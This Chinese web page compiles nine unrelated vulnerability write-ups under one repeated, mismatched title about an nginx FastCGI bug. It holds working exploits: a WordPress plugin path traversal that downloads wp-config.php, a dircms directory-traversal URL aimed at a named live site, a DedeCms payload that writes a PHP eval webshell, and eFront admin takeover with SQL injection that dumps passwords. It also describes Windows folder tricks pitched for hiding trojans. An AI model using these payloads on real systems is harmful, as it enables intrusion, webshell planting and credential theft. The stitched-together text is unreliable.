nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警

2025-01-19

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警(通用9篇)

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇1

现在一定还有很多网站用的nginx,自从N个月以前的nginx解析漏洞以来,现在差不多都修复了,一般语句都是这么写的

if ( $fastcgi_script_name ~ ..*/.*php ) {

return 403;

}

当匹配*/*.php*的时候则返回403

但是有些fastcgi配置的却不只有.php,有些甚至配置了ph*,(网上有一篇文章就是这么写的)

这样.ph*就没法匹配.php*也就又引发漏洞

此bug是我一个朋友Clouds发现的,

解决方法就是看fastcgi配置文件来设置要deny掉的文件后缀

在有些特定的时候,还可以用robots.txt/1.PhP

例如

if ( $fastcgi_script_name ~ ..*/.*ph* ) {

return 403;

}

不过最好的方法还是cgi.fix_pathinfo=0

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇2

用来替换文件的replace,连正在使用的文件也能替换,非常无敌。

比如:在C:下建一个目录,c:aaa

然后复制一首mp3到c:aaa并命名为c:aaaa.mp3

然后再复制另一首歌到C:a.mp3

然后用media player 播放c:aaaa.mp3

在命令提示符下输入:replace c:a.mp3 c:aaa

过一会,是不是播放的歌已变为另一首。

用这个命令来替换系统文件真是太爽了,并且XP的系统文件保护也对它无效。

再也不用到安全模式下去替换文件了

2.Windows文件系统漏洞-小漏洞,大用处

大家都知道在Windows中“”符号是路径的分隔符号,比如“C:Windows”的意思就是C分区中的Windows文件夹,“C:WindowsSystem.exe”的意思就是C分区中的Windows文件夹中的System.exe文件,好继续我们假设一下:

如果文件名中有“”符号会怎么样呢?假如“S”是一个文件夹的名字,这个文件夹位于:“F:”,他的路径就是“F:S”,当我们试图访问的时候Windows会错误的认为我们要打开的文件是C分区的S文件夹,这样Windows就无法打开并且会返回一个错误,因为以上的路径并不存在。

也许你现在正在尝试创建“S”文件,但是Windows会提示你:“”符号是不能作为文件、文件夹的名字的。看来Windows还是早已想到这一点了的。OK我们继续进行,就不信不能建立包含“”符号的文件。

现在打开你的电脑,我们要做一些很有趣的尝试。进入Windows后 点击:开始>运行 然后输入“cmd”并会车(如果是Win98请输入“COMMAND”),这时你会看到Windows的命令控制台,我们就是要利用它完成我们剩下的测试,以下包含了很多命令其中{}中的字符是我的注释:

quote:

--------------------------------------------------------------------------------

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985- Microsoft Corp.

F:Test>mkdir s {我们的第一次尝试,结果Windows只创建了S文件夹”“被忽略掉了}

F:Test>mkdir ss1 {还是失败,Windows先创建了S文件夹,然后在S内创建s1文件夹}

F:Test>mkdir s. {”s.“被解析成S”.“又被忽略了}

子目录或文件 s. 已经存在。

F:Test>mkdir s.. {终于成功了,现在你可以在资源管理器看到”s.“但却无法打开/删除}

F:Test>mkdir s... {又成功了,在资源浏览器能看到”s.."可以打开但是无法删除}

为什么会这样?我们先说你看到的这个“S.”文件夹,他即不能打开也不能删除,不能打开是因为他的实际路径是“F:Tests..”(我们自己创建的所以可以确定他的实际路径)但是在Windows资源管理器中名字变成了“S.”也就是说当你试图打开它的时候Windows实际上尝试打开“F:Tests.”当然是不能打开的,文件并不存在,所以Windows会报错。不能删除也是因为这个,Windows把一个实际存在的文件路径错误的解析为一个不存在的路径,并进行操作当然是无法完成的。

该说“S..”这个文件了,这个文件可以打开,但是却无法删除。等等……打开?你以为Windows真的是打开了我们创建的“s...”文件了吗?我们做下面的试验你就明白了。还是老规矩{}是我的注释方便大家理解:

quote:

--------------------------------------------------------------------------------

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

F:Test>echo 1 > Txt1.txt {创建“F:TestTxt1.txt”文件}

F:Test>copy Txt1.txt s.. {复制刚刚创建的文件到“s..”,就是资源管理器的“S.”}

已复制 1 个文件,

F:Test>echo 2 > Txt2.txt {创建“F:TestTxt2.txt”文件}

F:Test>copy Txt2.txt s.. {复制刚刚创建的文件到“s...”,资源管理器的“S..”}

已复制 1 个文件。

F:Test>

现在回到你的资源管理器打开“S..”文件夹,你看到了什么?“Txt1.txt”文件怎么会在这里?我们刚刚的确复制到了“S.”呀?难道我们打开“S..”文件夹实际上就是打开了“S.”?不错事实就是这样。其实如果你再创建一个“S”文件夹的话“S.”就能打开了,但是实际上打开的是“S”。

“我该怎么删除它呢?”,删除它也不算很难,但是常规的方法是绝对删不掉的。有两种方法可供选择:1;进入DOS删除(不推荐)。2;还是进入命令提示符然后输入“rmdir 目录名”,目录名就是你创建的时候的名字,如果忘记了可以先在资源管理器查看,然后加上“.”。如果提示“文件夹不是空的”应该加上“/s”参数。删除实例:

quote:

--------------------------------------------------------------------------------

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

F:Test>dir

驱动器 F 中的卷是 BGTING

卷的序列号是 2C8E-FE1C

F:Test 的目录

-09-11 17:50

.

2003-09-11 17:50

..

2003-09-11 18:35

s.

2003-09-11 18:37

s..

1 个文件 9 字节

5 个目录 3,390,029,824 可用字节

F:Test>rmdir s..目录不是空的。

F:Test>rmdir s.. /s

s.., 是否确认(Y/N)? y

F:Test>rmdir s... /s

s..., 是否确认(Y/N)? y

利用这个漏洞我们可以做很多事情,比如想访问“S”文件夹,但是没有权限的时候我们可以创建“S..”来指向“S”这样就可以跨权限浏览。而且新一代的木马程序很可能利用此漏洞把自身藏在某个“X..”目录下这样用户根本不可能发现他,就算专业级的杀毒软件也只会去杀“X”而跳过“X..”。如果恶意程序在机的计算机上创建很多“..”文件夹的话,哈哈~那个时候Fotmat也许是最好的选择了。现在微软官方好像还没有发布任何防范措施。

怎么样是不是有点晕了?不要怕“晕”是很正常的,我已经晕了很多次了。 :)

好了,说了这么多可能有点乱了。下面我总结一下:

1;在Windows中创建“X..”文件夹后该文件夹将无法通过常规方法删除,但是却可以Copy文件进去,在资源管理器显示为“X.”,错误的指向“X”文件夹。(嘿嘿,怎么有点像快捷方式?)

2;创建“X..”的方法是在命令行输入“mkdir X..”。

3;删除它的方法是在命令行输入“rmdir 目录名”,目录名就是你创建的时候的名字,如果忘记了可以先在资源管理器查看,然后加上“.”。如果提示“文件夹不是空的”应该加上“/s”参数。

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇3

由于某些资源容器对数据处理不当导致json劫持漏洞.

详细说明:

由于ie支持vbscript,所以script元素可以指定成vbscript语言:

当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.

漏洞证明:

1.json:

[{“name”:“sogili”,“age”:19}]

修复方案:

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇4

查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL,

WordPresswpFileManagerFileDownload漏洞利用方法漏洞预警

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇5

今天无聊想找个CMS挖看看,

就在A5找到 dircms

商业版那个叫贵吖。又不安全,不知道是不是就一个程序员,一个客服的小公司。

挖到一个遍历目录

貌似还有地方可以拿shell晚上回家测试

刚刚百度,乌云貌似是12号有提交

不过还没有公开所以不算抄袭,

测试网站:www.tengzhou0632.com

先注册会员

然后打开EXP:Madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../

然后目录就全部爆出来了,喜欢的自己下载源码去研究。有免费版的。

下载地址:down.chinaz.com/soft/27402.htm

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇6

正方高校教务管理系统漏洞修复漏洞预警

近期该系统爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限。下面给出漏洞的情况和修复方法:

漏洞类型:上传漏洞

漏洞文件:/ftb.imagegallery.aspx

该漏洞文件没有任何权限限制,访问者可以直接访问该文件,从而通过文件自有的上传功能,来上传构造好的可以解析的后门文件。

漏洞修复:可以设置images目录脚本解析权限为无.有能力的可以针对此文件做好权限身份验证,禁止普通用户访问.

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇7

有需要的朋友可以在下面的网址去下载sourceforge.net/project/showfiles.php?group_id=66812

BugTracker.NET的首页是ifdefined.com/bugtrackernet.html,开源软件。想研究源码的直接下回去研究就是了。

你需要安装IIS和ASP.NET2.0。同时SQL Server也必须运行起来,SQL Express也可以

下面是主要的步骤

1.解压缩zip文件到一个目录

2.创建一个IIS虚拟目录并且指向刚才的文件夹。请查看下面的连接support.microsoft.com/kb/172138了解如何创建IIS虚拟目录

3.编辑文件Welcoming ,根据不同的节改变如下的设置

LogFileFolder指向日志文件夹

AbsoluteUrlPrefix指向首页

4.创建数据库,名字根据喜好而定。如国你没有SQL Server Management Studio Express来创建数据库。你可以用BugTracker.NET的

网页来替代这个工作。首先设置Web.config中的ConnectionString指向master数据库,打开网站导向到首页。选择Setup Database Tables联接,然后点击Create Database按钮。

5.修改web.config中的ConnectionString指向你新创建的数据

6.打开浏览器导向到站点的虚拟目录,并且以用户admin(密码是admin)登陆(如果默认页面不是default.aspx,请在IIS中指定默认页)

系统会提示运行setup.sql,创建表格,你也可以在SQL企业管理器中运行这个脚本,

7.请认真读下面的警告

警告:如果你打算在公共服务器上使用BugTracking.NET作为您的Bug跟踪管理系统,当安装配置完成后,你还应该做下面的事:

1.改变admin帐户的密码

2.删除下面的文件:query.aspx install.aspx

现在,你可以开始通过点add a bug开始创建bug.请花一些时间来阅读这篇文档,同时也请阅读web.config了解你能用BugTracker.NET能为你做什么。

如果你打算备份BugTracker.NET数据,备份下面的文件:

1. SQL Server数据库

2.Web.config中指定的UploadFolder.

3.你的自定义配置文件

a) Web.config

b) btnet_service.exe.config

c) btnet_custom.css, btnet_edit_bug.css, btnet_search.css

参考文献:ifdefined.com/bugtrackernet.html

网盘下载:点击下载

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇8

DedeCms v5.6漏洞描述:

在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用

测试方法:

注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name=“']=0;phpinfo;//”}x{/dede:toby57},发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name=“']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//”}x{/dede:toby57}

生成x.php 密码:xiao直接生成一句话,

DedeCms v5.6 恶意代码执行漏洞漏洞预警

nginx fastcgi配置失误+解析漏洞引发的漏洞漏洞预警 篇9

# Google Dork: ”eFront (version 3.6.9)“ inurl:index.php?ctg=*

# Date: 5/09/

# Public release: When 3.6.10 will be released

# Author: IHTeam

# Software Link:www.efrontlearning.net/download/download-efront.html

# Tested on: efront_3.6.9_build11018

# Original Advisory:iht.li/FWh

# Advisory code:iht.li/p/0VV

Default username and password:

student:student

professor:professor

How to become admin:

Request 1: /change_account.php?login=admin

Request 2: /userpage.php

OR

simple use the [Switch account] option on top of the page;

Now you are in admin area;

SQL Injection:

www/student.php?ctg=messages&folder=UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --

www/professor.php?ctg=messages&folder=UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --

上一篇:十八大百条宣传标语下一篇:现代信息技术工作计划